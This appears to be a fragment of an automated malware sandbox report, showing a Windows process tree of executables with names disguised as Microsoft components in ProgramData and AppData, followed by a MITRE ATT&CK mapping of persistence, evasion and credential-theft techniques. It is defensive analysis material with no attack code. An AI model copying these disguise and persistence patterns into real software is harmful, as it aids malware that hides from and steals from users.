C:\ProgramData\SoftwareDistributionregid.1991-06.com.microsoft-type6.6.0.2\SoftwareDistributionregid.1991-06.com.microsoft-type6.6.0.2.exe
C:\ProgramData\SoftwareDistributionregid.1991-06.com.microsoft-type6.6.0.2\SoftwareDistributionregid.1991-06.com.microsoft-type6.6.0.2.exe
1⤵
PID:7188

C:\Users\Admin\AppData\Roaming\wtbdtsa
C:\Users\Admin\AppData\Roaming\wtbdtsa
1⤵
PID:6352

C:\Users\Admin\AppData\Roaming\wtbdtsa
C:\Users\Admin\AppData\Roaming\wtbdtsa
2⤵
PID:7708

C:\ProgramData\WindowsHolographicDevicesWindowsHolographicDevices-type9.9.4.1\WindowsHolographicDevicesWindowsHolographicDevices-type9.9.4.1.exe
C:\ProgramData\WindowsHolographicDevicesWindowsHolographicDevices-type9.9.4.1\WindowsHolographicDevicesWindowsHolographicDevices-type9.9.4.1.exe
1⤵
PID:1560

C:\Users\Admin\AppData\Local\ff5c3531-a01a-4c50-9c95-ad3eb0ab17e2\stpoeoeiej.exe
C:\Users\Admin\AppData\Local\ff5c3531-a01a-4c50-9c95-ad3eb0ab17e2\stpoeoeiej.exe --Task
1⤵
PID:5364

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

T1064

Scheduled Task

Persistence

Winlogon Helper DLL

T1004

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Modify Registry

File Permissions Modification

T1222

Scripting

T1064

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery